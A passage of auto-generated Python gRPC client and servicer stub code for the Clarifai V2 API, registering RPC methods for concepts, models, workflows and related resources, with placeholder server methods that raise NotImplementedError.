response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.SingleConceptResponse,
)
self.ListConcepts = channel.unary_unary(
'/clarifai.api.V2/ListConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.ListConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse,
)
self.PostConceptsSearches = channel.unary_unary(
'/clarifai.api.V2/PostConceptsSearches',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PostConceptsSearchesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse,
)
self.PostConcepts = channel.unary_unary(
'/clarifai.api.V2/PostConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PostConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse,
)
self.PatchConcepts = channel.unary_unary(
'/clarifai.api.V2/PatchConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PatchConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse,
)
self.GetVocab = channel.unary_unary(
'/clarifai.api.V2/GetVocab',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.GetVocabRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.SingleVocabResponse,
)
self.ListVocabs = channel.unary_unary(
'/clarifai.api.V2/ListVocabs',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.ListVocabsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse,
)
self.PostVocabs = channel.unary_unary(
'/clarifai.api.V2/PostVocabs',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PostVocabsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse,
)
self.PatchVocabs = channel.unary_unary(
'/clarifai.api.V2/PatchVocabs',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PatchVocabsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse,
)
self.DeleteVocab = channel.unary_unary(
'/clarifai.api.V2/DeleteVocab',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.DeleteVocabs = channel.unary_unary(
'/clarifai.api.V2/DeleteVocabs',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.ListVocabConcepts = channel.unary_unary(
'/clarifai.api.V2/ListVocabConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.ListVocabConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse,
)
self.PostVocabConcepts = channel.unary_unary(
'/clarifai.api.V2/PostVocabConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PostVocabConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse,
)
self.DeleteVocabConcept = channel.unary_unary(
'/clarifai.api.V2/DeleteVocabConcept',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabConceptRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.DeleteVocabConcepts = channel.unary_unary(
'/clarifai.api.V2/DeleteVocabConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.GetConceptLanguage = channel.unary_unary(
'/clarifai.api.V2/GetConceptLanguage',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.GetConceptLanguageRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.SingleConceptLanguageResponse,
)
self.ListConceptLanguages = channel.unary_unary(
'/clarifai.api.V2/ListConceptLanguages',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.ListConceptLanguagesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse,
)
self.PostConceptLanguages = channel.unary_unary(
'/clarifai.api.V2/PostConceptLanguages',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.PostConceptLanguagesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse,
)
self.PatchConceptLanguages = channel.unary_unary(
'/clarifai.api.V2/PatchConceptLanguages',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.PatchConceptLanguagesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse,
)
self.ListConceptReferences = channel.unary_unary(
'/clarifai.api.V2/ListConceptReferences',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__reference__pb2.ListConceptReferencesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__reference__pb2.MultiConceptReferenceResponse,
)
self.ListConceptRelations = channel.unary_unary(
'/clarifai.api.V2/ListConceptRelations',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__graph__pb2.ListConceptRelationsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse,
)
self.GetInputCount = channel.unary_unary(
'/clarifai.api.V2/GetInputCount',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.GetInputCountRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.SingleInputCountResponse,
)
self.StreamInputs = channel.unary_unary(
'/clarifai.api.V2/StreamInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.StreamInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse,
)
self.GetInput = channel.unary_unary(
'/clarifai.api.V2/GetInput',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.GetInputRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.SingleInputResponse,
)
self.ListInputs = channel.unary_unary(
'/clarifai.api.V2/ListInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.ListInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse,
)
self.PostInputs = channel.unary_unary(
'/clarifai.api.V2/PostInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse,
)
self.PatchInputs = channel.unary_unary(
'/clarifai.api.V2/PatchInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.PatchInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse,
)
self.DeleteInput = channel.unary_unary(
'/clarifai.api.V2/DeleteInput',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.DeleteInputRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.DeleteInputs = channel.unary_unary(
'/clarifai.api.V2/DeleteInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.DeleteInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.PostModelOutputs = channel.unary_unary(
'/clarifai.api.V2/PostModelOutputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostModelOutputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_output__pb2.MultiOutputResponse,
)
self.PostModelFeedback = channel.unary_unary(
'/clarifai.api.V2/PostModelFeedback',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostModelFeedbackRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.GetModel = channel.unary_unary(
'/clarifai.api.V2/GetModel',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.GetModelRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse,
)
self.GetModelOutputInfo = channel.unary_unary(
'/clarifai.api.V2/GetModelOutputInfo',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.GetModelRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse,
)
self.ListModels = channel.unary_unary(
'/clarifai.api.V2/ListModels',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.ListModelsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse,
)
self.PostModelsSearches = channel.unary_unary(
'/clarifai.api.V2/PostModelsSearches',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.PostModelsSearchesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse,
)
self.PostModels = channel.unary_unary(
'/clarifai.api.V2/PostModels',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.PostModelsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse,
)
self.PatchModels = channel.unary_unary(
'/clarifai.api.V2/PatchModels',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.PatchModelsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse,
)
self.DeleteModel = channel.unary_unary(
'/clarifai.api.V2/DeleteModel',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.DeleteModelRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.DeleteModels = channel.unary_unary(
'/clarifai.api.V2/DeleteModels',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.DeleteModelsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.ListModelInputs = channel.unary_unary(
'/clarifai.api.V2/ListModelInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.ListModelInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse,
)
self.GetModelVersion = channel.unary_unary(
'/clarifai.api.V2/GetModelVersion',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.GetModelVersionRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse,
)
self.ListModelVersions = channel.unary_unary(
'/clarifai.api.V2/ListModelVersions',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.ListModelVersionsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.MultiModelVersionResponse,
)
self.PostModelVersions = channel.unary_unary(
'/clarifai.api.V2/PostModelVersions',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.PostModelVersionsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse,
)
self.DeleteModelVersion = channel.unary_unary(
'/clarifai.api.V2/DeleteModelVersion',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.DeleteModelVersionRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.GetModelVersionMetrics = channel.unary_unary(
'/clarifai.api.V2/GetModelVersionMetrics',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.GetModelVersionMetricsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse,
)
self.PostModelVersionMetrics = channel.unary_unary(
'/clarifai.api.V2/PostModelVersionMetrics',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.PostModelVersionMetricsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse,
)
self.GetWorkflow = channel.unary_unary(
'/clarifai.api.V2/GetWorkflow',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.GetWorkflowRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.SingleWorkflowResponse,
)
self.ListWorkflows = channel.unary_unary(
'/clarifai.api.V2/ListWorkflows',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.ListWorkflowsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse,
)
self.ListPublicWorkflows = channel.unary_unary(
'/clarifai.api.V2/ListPublicWorkflows',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.ListPublicWorkflowsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse,
)
self.PostWorkflows = channel.unary_unary(
'/clarifai.api.V2/PostWorkflows',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse,
)
self.PatchWorkflows = channel.unary_unary(
'/clarifai.api.V2/PatchWorkflows',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PatchWorkflowsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse,
)
self.DeleteWorkflow = channel.unary_unary(
'/clarifai.api.V2/DeleteWorkflow',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.DeleteWorkflowRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.DeleteWorkflows = channel.unary_unary(
'/clarifai.api.V2/DeleteWorkflows',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.DeleteWorkflowsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.PostWorkflowResults = channel.unary_unary(
'/clarifai.api.V2/PostWorkflowResults',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowResultsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowResultsResponse,
)
self.PostSearches = channel.unary_unary(
'/clarifai.api.V2/PostSearches',
request_serializer=proto_dot_clarifai_dot_api_dot_search__pb2.PostSearchesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_search__pb2.MultiSearchResponse,
)
self.PostSearchFeedback = channel.unary_unary(
'/clarifai.api.V2/PostSearchFeedback',
request_serializer=proto_dot_clarifai_dot_api_dot_search__pb2.PostSearchFeedbackRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse,
)
self.GetSubscription = channel.unary_unary(
'/clarifai.api.V2/GetSubscription',
request_serializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.GetSubscriptionRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.SingleSubscriptionResponse,
)
self.PostSubscription = channel.unary_unary(
'/clarifai.api.V2/PostSubscription',
request_serializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.PostSubscriptionRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.SingleSubscriptionResponse,
)
self.GetAppVisualization = channel.unary_unary(
'/clarifai.api.V2/GetAppVisualization',
request_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.GetAppVisualizationRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse,
)
self.GetVisualization = channel.unary_unary(
'/clarifai.api.V2/GetVisualization',
request_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.GetVisualizationRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse,
)
self.PostVisualization = channel.unary_unary(
'/clarifai.api.V2/PostVisualization',
request_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.PostVisualizationRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse,
)
self.ListStatusCodes = channel.unary_unary(
'/clarifai.api.V2/ListStatusCodes',
request_serializer=proto_dot_clarifai_dot_api_dot_code__pb2.ListStatusCodesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_code__pb2.MultiStatusCodeResponse,
)
self.GetStatusCode = channel.unary_unary(
'/clarifai.api.V2/GetStatusCode',
request_serializer=proto_dot_clarifai_dot_api_dot_code__pb2.GetStatusCodeRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_code__pb2.SingleStatusCodeResponse,
)
class V2Servicer(object):
# missing associated documentation comment in .proto file
pass
def GetConceptCounts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetConcept(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostConceptsSearches(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetVocab(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListVocabs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostVocabs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchVocabs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteVocab(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteVocabs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListVocabConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostVocabConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteVocabConcept(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteVocabConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetConceptLanguage(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListConceptLanguages(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostConceptLanguages(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchConceptLanguages(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListConceptReferences(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListConceptRelations(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetInputCount(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def StreamInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetInput(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteInput(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModelOutputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModelFeedback(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetModel(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetModelOutputInfo(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListModels(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModelsSearches(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModels(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchModels(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteModel(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteModels(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListModelInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetModelVersion(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListModelVersions(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModelVersions(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteModelVersion(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetModelVersionMetrics(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModelVersionMetrics(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetWorkflow(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListWorkflows(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListPublicWorkflows(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostWorkflows(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchWorkflows(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteWorkflow(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteWorkflows(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostWorkflowResults(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostSearches(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostSearchFeedback(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetSubscription(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostSubscription(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetAppVisualization(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetVisualization(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostVisualization(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListStatusCodes(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
